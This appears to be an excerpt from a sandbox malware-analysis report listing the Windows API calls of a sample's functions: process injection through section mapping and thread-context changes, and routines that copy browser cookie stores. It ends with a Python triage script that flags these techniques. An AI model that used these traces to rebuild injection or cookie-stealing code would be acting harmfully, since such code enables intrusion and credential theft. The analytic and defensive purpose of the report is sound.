    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
  • Instruction Fuzzy Hash: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
  • SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: RegCloseKeyRegQueryValueExwsprintf
  • String ID: Client
  • API String ID: 1809512201-3236430179
  • Opcode ID: 9042b19d19dd4b3d942996e0d3ea8ecf2d3d2b777e835d7718659b5b290a5e22
  • Instruction ID: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
  • Opcode Fuzzy Hash: 8CF04634A804C58A8693A885092A7FC4571B352AEECCCBF20F15852181FFC977D73B11
  • Instruction Fuzzy Hash: bd4461f6c7afc55672d071394b4a111d53588a956b6005c1a3bb12a79494774e
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(001CD70D,Client,00000000,?,001EA06C,?,00000001,001CD70D,00000000,00000000,00000001,?,?,00000000,001CD70D), ref: 001C3D98
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,?), ref: 001DE242
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
    • Part of subcall function 001DE1CF: RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
    • Part of subcall function 001DE1CF: GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
    • Part of subcall function 001DE1CF: HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
  • RegCloseKey.ADVAPI32(001CD70D,?,?,00000000,001CD70D,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C3DE1
  • wsprintfA.USER32 ref: 001C3E55
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
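The function listings above are raw per-function call bullets; at this volume an analyst wants the calls grouped per function, the hex constants named, and the call sets that indicate a technique flagged automatically. The Python below is an added example written for this page, not Joe Sandbox's own tooling. It parses the bullet format shown above and classifies each block. Assumptions: the technique table and the constant table are this example's own; SAMPLE_REPORT is constructed by copying three blocks from the report above; Joe Sandbox prints stack slots at call time, so only documented parameter positions are decoded and the trailing entries (for instance the 16-entry lstrlen lines) are treated as residue. One detail the table makes explicit: the RtlAdjustPrivilege(00000013,...) call listed in the first block enables privilege 19, SeShutdownPrivilege, not SeDebugPrivilege (20, 0x14), which is the value analysts often assume when they see that call in a dropper.

```python
"""Triage helper for the Joe Sandbox function dump on this page: an added example, not Joe
Sandbox tooling.  Groups each 'Similarity' block's calls, names known constants, flags techniques."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Matches one call bullet, with or without an argument list and with or without a subcall prefix.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?(?P<api>\w+)\.\w+"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)")
# (API, parameter index) -> names for raw hex values; slots past the real arity are stack residue.
ARG_NAMES = {
    ("NtOpenProcessToken", 1): {0x8: "TOKEN_QUERY"},
    ("NtQueryInformationToken", 1): {0x1: "TokenUser"},
    ("NtCreateSection", 1): {0xF001F: "SECTION_ALL_ACCESS"},
    ("NtCreateSection", 4): {0x40: "PAGE_EXECUTE_READWRITE"},
    ("NtCreateSection", 5): {0x8000000: "SEC_COMMIT"},
    ("RtlAdjustPrivilege", 0): {0x13: "SeShutdownPrivilege", 0x14: "SeDebugPrivilege"},
}
# API sets that together indicate a technique; matched on calls, subcalls and the 'API ID' line.
TECHNIQUES = {
    "token inspection": {"NtOpenProcessToken", "NtQueryInformationToken"},
    "section-mapping injection": {"NtCreateSection", "NtMapViewOfSection"},
    "thread-context hijack": {"NtWriteVirtualMemory", "NtSetContextThread"},
    "APC injection": {"OpenThread", "QueueUserAPC"},
}

@dataclass
class Call:
    api: str
    args: list[str]
    ref: str
    subcall: str | None  # callee address when the call is reached through a subcall

@dataclass
class Function:
    api_id: str = ""
    calls: list[Call] = field(default_factory=list)

def parse_report(text: str) -> list[Function]:
    """One Function per 'Similarity' block; bullets between 'APIs' and 'Memory Dump Source'."""
    functions: list[Function] = []
    in_apis = False
    for line in text.splitlines():
        s = line.strip()
        if s == "Similarity":
            functions.append(Function())
            in_apis = False
        elif not functions:
            continue
        elif s.startswith("• API ID:"):
            functions[-1].api_id = s.split(":", 1)[1].strip()
        elif s in ("APIs", "Memory Dump Source"):
            in_apis = s == "APIs"
        elif in_apis and (m := CALL_RE.match(line)):
            args = [a for a in (m.group("args") or "").split(",") if a]
            functions[-1].calls.append(Call(m.group("api"), args, m.group("ref"), m.group("sub")))
    return functions

def decode(call: Call) -> dict[int, str]:
    """Argument position -> constant name, for the values ARG_NAMES knows."""
    return {i: ARG_NAMES[call.api, i][int(raw, 16)]
            for i, raw in enumerate(call.args)
            if (call.api, i) in ARG_NAMES and re.fullmatch(r"[0-9A-F]+", raw)
            and int(raw, 16) in ARG_NAMES[call.api, i]}

def classify(fn: Function) -> list[str]:
    """Every technique whose API set is fully present in this function."""
    seen = {c.api for c in fn.calls}
    return [name for name, apis in TECHNIQUES.items()
            if all(a in seen or a in fn.api_id for a in apis)]

def triage(text: str) -> list[dict]:
    """Per function: first ref, techniques, and decoded constants keyed 'API[index]'."""
    return [{"ref": fn.calls[0].ref if fn.calls else None, "techniques": classify(fn),
             "constants": {f"{c.api}[{i}]": n for c in fn.calls for i, n in decode(c).items()}}
            for fn in parse_report(text)]

# Constructed input: three blocks copied from the report above (API ID line plus bullets).
SAMPLE_REPORT = """\
Similarity
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
APIs
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
Memory Dump Source
Similarity
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
Memory Dump Source
Similarity
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
Memory Dump Source
"""

if __name__ == "__main__":
    print(*triage(SAMPLE_REPORT), sep="\n")
```

The 'API ID' fallback in classify is what makes the third sample block work: its bullet list ends at CreateToolhelp32Snapshot, as it does on this page, but the API ID line still names OpenThread and QueueUserAPC, so the block is still flagged as APC injection. Section-mapping injection in the second block is only visible because the NtMapViewOfSection call sits in a subcall line, which is why subcalls are parsed into the same call set as direct calls.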

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
